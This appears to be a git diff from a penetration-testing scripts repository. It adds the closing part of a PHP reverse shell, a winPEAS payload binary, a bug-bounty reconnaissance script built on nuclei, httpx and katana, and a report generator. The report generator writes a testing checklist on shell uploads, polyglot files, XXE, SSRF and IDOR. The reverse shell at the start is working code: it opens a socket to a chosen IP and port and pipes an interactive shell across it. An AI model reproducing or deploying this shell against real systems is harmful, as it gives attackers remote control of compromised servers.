||||||
|
chdir("/");
|
||||||
|
|
||||||
|
// Remove any umask we inherited
|
||||||
|
umask(0);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Do the reverse shell...
|
||||||
|
//
|
||||||
|
|
||||||
|
// Open reverse connection
|
||||||
|
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||||
|
if (!$sock) {
|
||||||
|
printit("$errstr ($errno)");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Spawn shell process
|
||||||
|
$descriptorspec = array(
|
||||||
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||||
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||||
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||||
|
);
|
||||||
|
|
||||||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||||
|
|
||||||
|
if (!is_resource($process)) {
|
||||||
|
printit("ERROR: Can't spawn shell");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set everything to non-blocking
|
||||||
|
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||||
|
stream_set_blocking($pipes[0], 0);
|
||||||
|
stream_set_blocking($pipes[1], 0);
|
||||||
|
stream_set_blocking($pipes[2], 0);
|
||||||
|
stream_set_blocking($sock, 0);
|
||||||
|
|
||||||
|
printit("Successfully opened reverse shell to $ip:$port");
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// Check for end of TCP connection
|
||||||
|
if (feof($sock)) {
|
||||||
|
printit("ERROR: Shell connection terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for end of STDOUT
|
||||||
|
if (feof($pipes[1])) {
|
||||||
|
printit("ERROR: Shell process terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait until a command is end down $sock, or some
|
||||||
|
// command output is available on STDOUT or STDERR
|
||||||
|
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||||
|
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||||
|
|
||||||
|
// If we can read from the TCP socket, send
|
||||||
|
// data to process's STDIN
|
||||||
|
if (in_array($sock, $read_a)) {
|
||||||
|
if ($debug) printit("SOCK READ");
|
||||||
|
$input = fread($sock, $chunk_size);
|
||||||
|
if ($debug) printit("SOCK: $input");
|
||||||
|
fwrite($pipes[0], $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDOUT
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[1], $read_a)) {
|
||||||
|
if ($debug) printit("STDOUT READ");
|
||||||
|
$input = fread($pipes[1], $chunk_size);
|
||||||
|
if ($debug) printit("STDOUT: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDERR
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[2], $read_a)) {
|
||||||
|
if ($debug) printit("STDERR READ");
|
||||||
|
$input = fread($pipes[2], $chunk_size);
|
||||||
|
if ($debug) printit("STDERR: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($sock);
|
||||||
|
fclose($pipes[0]);
|
||||||
|
fclose($pipes[1]);
|
||||||
|
fclose($pipes[2]);
|
||||||
|
proc_close($process);
|
||||||
|
|
||||||
|
// Like print, but does nothing if we've daemonised ourself
|
||||||
|
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||||
|
function printit ($string) {
|
||||||
|
if (!$daemon) {
|
||||||
|
print "$string\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
Binary file not shown.
264
scripts/pentesting/bb-recon
Executable file
264
scripts/pentesting/bb-recon
Executable file
|
|
@ -0,0 +1,264 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: bb-recon
# Description: Bug-bounty-safe web application reconnaissance
# Usage: bb-recon <url>
# Creates tmux window with parallel safe recon (nuclei info/low, katana, subdomain takeover)
# Based on Jason Haddix's Bug Hunter Methodology

VERSION="1.0.0"

# ANSI color escape sequences; the backslash escapes are interpreted at
# print time by `echo -e` (the variables hold literal "\033..." text).
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'  # reset to default terminal attributes

# Status indicators used as message prefixes.
# NOTE(review): GREENSTAR actually renders in YELLOW despite its name, and
# GREENPLUS/REDMINUS/REDEXCLAIM are not referenced anywhere in this
# script's visible code — presumably kept for parity with sibling scripts;
# confirm before removing.
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
#######################################
# Print the usage/help text for bb-recon to stdout.
# Globals:   BOLD, NC, VERSION (read)
# Arguments: none
# Outputs:   help text on stdout
#######################################
show_help() {
  # All lines are emitted through printf '%b\n', which interprets the
  # "\033" escapes embedded in the color variables exactly like `echo -e`.
  local -a help_lines=(
    "${BOLD}bb-recon${NC} - Bug Bounty Reconnaissance v${VERSION}"
    ""
    "${BOLD}USAGE:${NC}"
    "  bb-recon <url>"
    ""
    "${BOLD}DESCRIPTION:${NC}"
    "  Bug-bounty-safe web reconnaissance with 4 parallel panes:"
    "  - Pane 1 (top-left): Nuclei (info/low + subdomain takeover)"
    "  - Pane 2 (top-right): httpx (technology detection + security headers)"
    "  - Pane 3 (bottom-left): Katana (JS-aware crawler for endpoint discovery)"
    "  - Pane 4 (bottom-right): Live results dashboard"
    ""
    "${BOLD}BUG BOUNTY PHILOSOPHY:${NC}"
    "  Based on Jason Haddix's Bug Hunter Methodology:"
    "  - Find FEATURES first, bugs second"
    "  - Focus on interactive, dynamic applications"
    "  - Conservative tools only (no exploitation)"
    "  - Discovery over brute-forcing"
    ""
    "${BOLD}EXAMPLES:${NC}"
    "  bb-recon https://target.com"
    "  bb-recon https://bugcrowd-target.com"
    "  bb-recon https://h1-program.hackerone.net"
    ""
    "${BOLD}OUTPUT:${NC}"
    "  All results saved to: ./bb-recon-<target>-<timestamp>/"
    ""
    "${BOLD}SAFE FOR BUG BOUNTY:${NC}"
    "  ✓ No directory brute-forcing (Feroxbuster removed)"
    "  ✓ No parameter fuzzing (Arjun removed)"
    "  ✓ Info/Low severity only (no exploit templates)"
    "  ✓ JS analysis for endpoint discovery (passive)"
    "  ✓ Subdomain takeover checks (safe)"
  )
  printf '%b\n' "${help_lines[@]}"
}
|
||||||
|
|
||||||
|
#######################################
# Verify external tooling is available.
# tmux is a hard requirement (exit 1 if absent); the ProjectDiscovery
# scanners are optional — missing ones are reported with install hints
# and their scans are simply skipped later.
# Globals:   RED, YELLOW, CYAN, NC (read)
# Outputs:   diagnostics on stdout
# Returns:   0, or exits 1 when a required tool is missing
#######################################
check_tools() {
  local -a required=()
  local -a recommended=()
  local tool

  # Hard requirement.
  command -v tmux &>/dev/null || required+=("tmux")

  # Optional scanners, checked in a fixed order.
  for tool in nuclei katana httpx; do
    command -v "$tool" &>/dev/null || recommended+=("$tool")
  done

  if [[ ${#required[@]} -gt 0 ]]; then
    echo -e "${RED}Error:${NC} Missing required tools: ${required[*]}"
    exit 1
  fi

  if [[ ${#recommended[@]} -gt 0 ]]; then
    echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${recommended[*]}"
    echo -e "${CYAN}Install with:${NC}"
    for tool in "${recommended[@]}"; do
      case "$tool" in
        nuclei) echo "  go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
        katana) echo "  go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
        httpx) echo "  go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
      esac
    done
    echo
  fi
}
|
||||||
|
|
||||||
|
#######################################
# Create a timestamped output directory for this scan and publish its
# path through the OUTPUT_DIR global used by every other function.
# Globals:   OUTPUT_DIR (written); GREEN, BOLD, NC (read)
# Arguments: $1 - target URL
# Outputs:   confirmation line on stdout
#######################################
setup_output_dir() {
  local url="$1"
  local timestamp clean_url

  # Declaration split from assignment so a failing `date` is not masked.
  timestamp=$(date +%Y%m%d-%H%M%S)

  # Strip the URL scheme, then replace path/port separators so the result
  # is a single safe directory-name component.
  # FIX: the original piped through `tr -d 'http'`, which deletes every
  # 'h', 't' and 'p' CHARACTER from the whole string, mangling names
  # (e.g. "target.com" -> "arge.com"). Parameter expansion removes the
  # scheme as a unit instead.
  clean_url="${url#*://}"
  clean_url="${clean_url//[\/:]/_}"

  OUTPUT_DIR="bb-recon-${clean_url}-${timestamp}"
  mkdir -p "$OUTPUT_DIR"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Main bug bounty recon function
#######################################
# Orchestrate the whole recon run: normalise the URL, create the output
# directory, then either spawn a 4-pane tmux window running the scanners
# in parallel, or fall back to sequential execution outside tmux.
# Globals:   OUTPUT_DIR (read, set by setup_output_dir); WINDOW_NAME (written);
#            color constants (read)
# Arguments: $1 - target URL (scheme optional; https:// is assumed)
# Outputs:   progress on stdout; scanner output lands in tmux panes /
#            $OUTPUT_DIR files
#######################################
run_bb_recon() {
  local url="$1"

  # Ensure URL has http:// or https:// (default to HTTPS when absent).
  if [[ ! "$url" =~ ^https?:// ]]; then
    url="https://$url"
    echo -e "${YELLOW}⚠${NC} No protocol specified, using HTTPS: $url"
  fi

  echo -e "${CYAN}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║ Bug Bounty Reconnaissance (Safe Mode) ║"
  echo "║ Target: $url"
  echo "║ Based on: Jason Haddix's Methodology ║"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Create output directory (sets the OUTPUT_DIR global).
  setup_output_dir "$url"

  # Outside tmux there is nothing to split — run the scans one by one.
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
    run_scans_sequential "$url"
    return
  fi

  # Create tmux window (URL truncated to 20 chars for the window title).
  WINDOW_NAME="--> BB: ${url:0:20}... <--"
  tmux new-window -n "$WINDOW_NAME"

  # Split into 4 panes with explicit targeting.
  # Layout: 2x2 grid with pipelines and live monitoring
  # ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
  # [1: nuclei]  [2: httpx]
  # [3: katana]  [4: live dashboard]
  #
  # CRITICAL: Tmux pane numbering behavior discovered through testing:
  #   Step 1: split-window -h creates [0:left] [1:right]
  #   Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
  #   Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
  # PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4.
  # NOTE(review): this renumbering presumably depends on the user's
  # pane-base-index setting — confirm on a default tmux config.

  # Split horizontally first (left | right)
  tmux split-window -h

  # Split left column vertically
  tmux select-pane -t 0
  tmux split-window -v

  # Split right column vertically (target pane 2 after left split)
  tmux select-pane -t 2
  tmux split-window -v

  # Force tiled layout for perfect 2x2 grid (equal-sized panes)
  tmux select-layout tiled

  # Final verified pane layout after tmux renumbering and tiled layout:
  #   1 (top-left)    2 (top-right)
  #   3 (bottom-left) 4 (bottom-right)

  # Pane 1 (top-left): Nuclei (info/low severity + subdomain takeover).
  # Each pane cd's into $PWD/$OUTPUT_DIR so result files land in one place.
  tmux select-pane -t 1
  if command -v nuclei &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting Nuclei scan (info/low + subdomain takeover)...${NC}' && nuclei -u '$url' -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
  fi

  # Pane 2 (top-right): httpx technology detection and security headers.
  tmux select-pane -t 2
  if command -v httpx &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Technology detection with httpx...${NC}' && echo '$url' | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt && echo -e '${GREEN}✓ httpx complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping tech detection${NC}'" C-m
  fi

  # Pane 3 (bottom-left): katana crawler, run once per output format
  # (plain, path, url, udir), then fold results into urls.txt/paths.txt.
  # NOTE(review): this crawls the target 4 times; confirm that is intended
  # rather than one crawl post-processed into the four formats.
  tmux select-pane -t 3
  if command -v katana &>/dev/null; then
    # Full katana with all output formats as originally requested
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
  fi

  # Pane 4 (bottom-right): live results dashboard — an infinite loop that
  # redraws counters from the scanners' output files every 3 seconds.
  tmux select-pane -t 4
  # Watch output files and show live statistics
  tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ BUG BOUNTY RECON DASHBOARD (SAFE MODE) ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Bug Bounty Safe Reconnaissance ═══${NC}'; echo; echo -e '${GREEN}Nuclei (info/low + takeover):${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || [ -f nuclei.log ] && grep -q 'complete' nuclei.log 2>/dev/null && echo ' Complete (0 findings)' || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Stack (httpx):${NC}'; [ -f httpx.txt ] && [ -s httpx.txt ] && echo \" Detected: \$(grep -c 'http' httpx.txt 2>/dev/null || echo 0) technologies\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana Crawler:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}JS Endpoints:${NC}'; [ -f katana_paths.txt ] && [ -s katana_paths.txt ] && echo \" Discovered: \$(wc -l < katana_paths.txt 2>/dev/null || echo 0) paths\" || echo ' None yet'; echo; echo -e '${CYAN}Latest Discoveries:${NC}'; [ -f katana_urls.txt ] && tail -5 katana_urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m

  # Focus back on top-left pane (nuclei)
  tmux select-pane -t 1

  echo
  echo -e "${GREEN}✓${NC} Tmux bug bounty recon window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> BB: ${url:0:20}... <--${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
  echo
  echo -e "${GREEN}Bug Bounty Safe:${NC}"
  echo -e " ✓ No directory brute-forcing"
  echo -e " ✓ No parameter fuzzing"
  echo -e " ✓ Info/Low severity only"
  echo -e " ✓ Passive endpoint discovery"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
#######################################
# Run the same safe scans one after another when no tmux session is
# available to parallelise them. Each scanner is skipped (with a notice)
# when it is not installed.
# Globals:   OUTPUT_DIR (read) - created by setup_output_dir; color
#            constants (read)
# Arguments: $1 - normalised target URL
# Outputs:   scanner progress on stdout; result files in $OUTPUT_DIR
#######################################
run_scans_sequential() {
  local url="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running nuclei (info/low + subdomain takeover)...${NC}"
  # NOTE(review): with `check && scan || echo`, the "not installed" message
  # also prints when the scanner exists but exits non-zero — confirm that
  # double duty is acceptable. (It also keeps `set -e` from aborting here.)
  command -v nuclei &>/dev/null && nuclei -u "$url" -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt || echo "nuclei not installed"

  echo -e "\n${GREENSTAR} Technology detection with httpx...${NC}"
  command -v httpx &>/dev/null && echo "$url" | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt || echo "httpx not installed"

  echo -e "\n${GREENSTAR} Running katana (JS-aware crawler)...${NC}"
  if command -v katana &>/dev/null; then
    # One crawl per requested output format (plain, path-only, url-only).
    katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
    katana -u "$url" -jc -kf all -aff -d 10 -f path -o katana_paths.txt
    katana -u "$url" -jc -kf all -aff -d 10 -f url -o katana_urls.txt
  fi

  # Return to the caller's directory; OUTPUT_DIR is always one level deep
  # (created relative to the cwd), so `cd ..` undoes the earlier `cd`.
  cd ..

  echo -e "\n${GREEN}✓${NC} Bug bounty recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# --- Entry point -----------------------------------------------------------
# Argument handling: help is shown for no arguments or an explicit help
# flag; an empty-string argument still falls through to the URL check
# below (and is rejected), exactly as before.

if [[ $# -eq 0 ]]; then
  show_help
  exit 0
fi

case "$1" in
  -h|--help|help)
    show_help
    exit 0
    ;;
esac

url="$1"

# Validate URL (reached only when an argument was supplied but empty).
if [[ -z "$url" ]]; then
  echo -e "${RED}Error:${NC} URL required"
  echo "Usage: bb-recon <url>"
  exit 1
fi

# Verify tooling, then kick off the reconnaissance run.
check_tools
run_bb_recon "$url"
|
||||||
353
scripts/pentesting/bb-report-generator
Executable file
353
scripts/pentesting/bb-report-generator
Executable file
|
|
@ -0,0 +1,353 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: bb-report-generator
# Description: Generate bug bounty recon report from bb-recon output
# Based on Jason Haddix's "Find Features First, Bugs Second" philosophy

VERSION="1.0.0"

# ANSI color escape sequences (interpreted at print time by `echo -e`).
# NOTE(review): BLUE and MAGENTA are not referenced in this script's
# visible code — presumably kept for parity with the sibling bb-recon.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'  # reset to default terminal attributes

#######################################
# Print the usage/help text for bb-report-generator to stdout.
# Globals:   BOLD, NC, VERSION (read)
# Outputs:   help text on stdout
#######################################
show_help() {
  echo -e "${BOLD}bb-report-generator${NC} - Bug Bounty Recon Report Generator v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo "  bb-report-generator <recon-directory>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo "  Analyzes bb-recon output and generates prioritized manual testing guide"
  echo "  Based on Jason Haddix's Bug Hunter Methodology"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo "  bb-report-generator ./bb-recon-target.com-20240101-120000"
  echo "  bb-report-generator ./bb-recon-*"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo "  Creates manual-testing-guide.md in the recon directory"
}
|
||||||
|
|
||||||
|
# Show help for no arguments or an explicit help flag.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

# The single positional argument is a bb-recon output directory.
RECON_DIR="$1"

if [[ ! -d "$RECON_DIR" ]]; then
  echo -e "${RED}Error:${NC} Directory not found: $RECON_DIR"
  exit 1
fi

# Banner.
echo -e "${CYAN}${BOLD}"
echo "╔════════════════════════════════════════════════════════════╗"
echo "║ Bug Bounty Recon Report Generator ║"
echo "║ Jason Haddix Methodology: Features → Bugs ║"
echo "╚════════════════════════════════════════════════════════════╝"
echo -e "${NC}"

# The generated guide lives alongside the recon data it summarises.
REPORT_FILE="$RECON_DIR/manual-testing-guide.md"
|
||||||
|
|
||||||
|
# Start report.
# FIX: the original wrote the ENTIRE header through a quoted here-doc
# (<< 'EOF'), so "**Generated:** $(date)" landed in the report literally,
# never expanding. The dynamic header now uses an UNQUOTED delimiter so
# $(date) expands; the static markdown that follows (which contains
# backticks and other characters that must NOT be shell-expanded) is
# emitted through a separate quoted here-doc.
cat > "$REPORT_FILE" << EOF
# Bug Bounty Manual Testing Guide

**Generated:** $(date)
**Philosophy:** Find FEATURES first, then BUGS second (Jason Haddix)
EOF

# Static guide body — quoted delimiter: no expansion of backticks/params.
cat >> "$REPORT_FILE" << 'EOF'

---

## 🎯 High Priority Testing Areas

Based on Jason Haddix's "Heat Map" - where bugs normally hide:

### 1. Upload Functions 🔥 (HIGHEST PRIORITY)
**Why:** Always vulnerable! XSS, XXE, SSRF, Shell upload

**Actions:**
- [ ] Find all file upload endpoints
- [ ] Test XML-based uploads (Docs/PDFs) for XXE and SSRF
- [ ] Test image uploads for XSS in filename/EXIF/binary header
- [ ] Check where uploaded files are stored (S3 misconfigurations?)
- [ ] Try polyglot files (valid image + shell code)

### 2. APIs 🔥
**Why:** Hidden HTTP methods, lack of auth, mass assignment, excessive data exposure

**Actions:**
- [ ] Test PUT, DELETE, PATCH methods (not just GET/POST)
- [ ] Check for missing authentication
- [ ] Test for mass assignment vulnerabilities
- [ ] Look for excessive data exposure in responses
- [ ] Analyze API versioning (v1, v2, etc.) for inconsistencies

### 3. Account Section (Profile/Settings) 🔥
**Why:** Stored XSS, SSTI, SSRF

**Actions:**
- [ ] Test ALL custom fields for Stored XSS
- [ ] Check bio, name, location, custom fields
- [ ] Test webhook URLs and callback URLs for SSRF
- [ ] Look for integrations that import external content

### 4. Content Types 🔥
**Why:** Multipart-forms "always have a vulnerability"

**Actions:**
- [ ] Test `multipart/form-data` for shell uploads, injections, bypasses
- [ ] Test `Content-Type: application/xml` for XXE
- [ ] Test `Content-Type: application/json` for API vulnerabilities

### 5. Error Messages
**Why:** Information disclosure, exotic injection vectors

**Actions:**
- [ ] Trigger errors intentionally
- [ ] Check stack traces for paths, versions, database types
- [ ] Test for Application DoS via resource exhaustion

### 6. URLs/Paths as Values
**Why:** SSRF, Open Redirects

**Actions:**
- [ ] Find parameters like: `?url=`, `?redirect=`, `?next=`, `?callback=`
- [ ] Test for SSRF vulnerabilities
- [ ] Test for open redirects

---

## 📊 Recon Summary

EOF
|
||||||
|
|
||||||
|
# --- Recon summary sections -------------------------------------------------
# Each section appends to $REPORT_FILE, preferring real scan output and
# falling back to a placeholder note when the source file is missing/empty.

# Technology stack: prefer httpx output, fall back to whatweb.
echo "### Technology Stack Identified" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/httpx.txt" ]]; then
  echo "**Technologies detected (httpx):**" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
  # FIX: was `cat file | head -20` (useless use of cat).
  head -20 "$RECON_DIR/httpx.txt" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
elif [[ -f "$RECON_DIR/whatweb.txt" ]]; then
  echo "**Technologies detected (whatweb):**" >> "$REPORT_FILE"
  # Pull the bracketed [plugin] tokens out of whatweb's one-line summary.
  grep -oE '\[[^\]]+\]' "$RECON_DIR/whatweb.txt" | sort -u | head -20 >> "$REPORT_FILE" || echo "None found" >> "$REPORT_FILE"
else
  echo "*No technology fingerprinting data available*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"

# Nuclei findings (bb-recon runs it with info/low severity only).
echo "### Nuclei Findings (Info/Low Severity)" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/nuclei.txt" ]] && [[ -s "$RECON_DIR/nuclei.txt" ]]; then
  NUCLEI_COUNT=$(wc -l < "$RECON_DIR/nuclei.txt")
  echo "**Total findings:** $NUCLEI_COUNT" >> "$REPORT_FILE"
  echo >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
  head -20 "$RECON_DIR/nuclei.txt" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
else
  echo "*No Nuclei findings*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"

# Subdomain takeover results.
# NOTE(review): bb-recon's visible code never writes takeover.txt (takeover
# templates report into nuclei.txt), so this branch may never fire — confirm.
echo "### Subdomain Takeover Check" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/takeover.txt" ]] && [[ -s "$RECON_DIR/takeover.txt" ]]; then
  echo "**⚠️ POTENTIAL TAKEOVER VULNERABILITIES FOUND!**" >> "$REPORT_FILE"
  echo >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
  cat "$RECON_DIR/takeover.txt" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
else
  echo "✅ No subdomain takeover vulnerabilities detected" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"

# Crawled endpoints (katana URL output).
echo "### Endpoints Discovered (Katana Crawler)" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/katana_urls.txt" ]] && [[ -s "$RECON_DIR/katana_urls.txt" ]]; then
  URL_COUNT=$(wc -l < "$RECON_DIR/katana_urls.txt")
  echo "**Total URLs crawled:** $URL_COUNT" >> "$REPORT_FILE"
  echo >> "$REPORT_FILE"
  echo "**Sample URLs (first 20):**" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
  head -20 "$RECON_DIR/katana_urls.txt" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
else
  echo "*No URLs discovered*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"

# JavaScript-derived paths (katana path output).
echo "### JavaScript Endpoints & Paths" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/katana_paths.txt" ]] && [[ -s "$RECON_DIR/katana_paths.txt" ]]; then
  PATH_COUNT=$(wc -l < "$RECON_DIR/katana_paths.txt")
  echo "**Total paths discovered:** $PATH_COUNT" >> "$REPORT_FILE"
  echo >> "$REPORT_FILE"
  echo "**Interesting paths (first 20):**" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
  head -20 "$RECON_DIR/katana_paths.txt" >> "$REPORT_FILE"
  echo '```' >> "$REPORT_FILE"
else
  echo "*No JavaScript paths discovered*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||||
|
|
||||||
|
# Add "The Big 6 Questions" section.
# Quoted here-doc delimiter: the markdown below is appended VERBATIM
# (backticks, "$" and "?" characters are not expanded — intentional,
# since the content includes literal shell-ish snippets and URLs).
cat >> "$REPORT_FILE" << 'EOF'

---

## 🔍 The Big 6 Questions (Jason Haddix)

Answer these before testing:

### 1. How does the app pass data?
**Map ALL input methods:**
- [ ] GET parameters
- [ ] POST parameters
- [ ] JSON body data
- [ ] XML body data
- [ ] Cookies
- [ ] Custom headers (X-*)
- [ ] WebSocket messages
- [ ] GraphQL queries

### 2. How/Where does the app talk about users?
**Find user identifiers for IDOR/Authorization testing:**
- [ ] User IDs in URLs
- [ ] UUIDs
- [ ] Email addresses
- [ ] Usernames
- [ ] Session tokens
- [ ] JWT tokens (decode and analyze!)

**Tip:** IDOR → XSS chain for higher severity!

### 3. Does the site have multi-tenancy or user levels?
**Test for authorization bugs:**
- [ ] Regular user vs Admin
- [ ] Free tier vs Premium tier
- [ ] Organization A vs Organization B
- [ ] Test horizontal access (User A → User B data)
- [ ] Test vertical access (User → Admin escalation)

**Use Burp's Autorize extension!**

### 4. Does the site have a unique threat model?
**Beyond PII, look for:**
- [ ] API keys and secrets (developer portals)
- [ ] Doxing opportunities (social platforms)
- [ ] Financial data (payment platforms)
- [ ] Healthcare data (HIPAA)

### 5. Has there been past security research?
**Search for previous vulnerabilities:**
- [ ] HackerOne disclosed reports
- [ ] Bugcrowd disclosures
- [ ] CVE databases
- [ ] Security researcher blogs
- [ ] Conference presentations

**Google:** `site:hackerone.com "target.com" disclosed`

### 6. How does the app handle XSS? CSRF? Injection?
**Understand defenses:**
- [ ] WAF presence (Cloudflare, Akamai, ModSecurity)
- [ ] XSS filters (CSP, Chrome Auditor)
- [ ] CSRF tokens (present? validated? reusable?)
- [ ] Input sanitization
- [ ] Output encoding

**Adaptive Strategy:** Don't waste time on hardened areas - find soft spots!

---

## 📋 Manual Testing Checklist

Based on findings, prioritize testing:

### Phase 1: Quick Wins
- [ ] Test all file upload endpoints (if any)
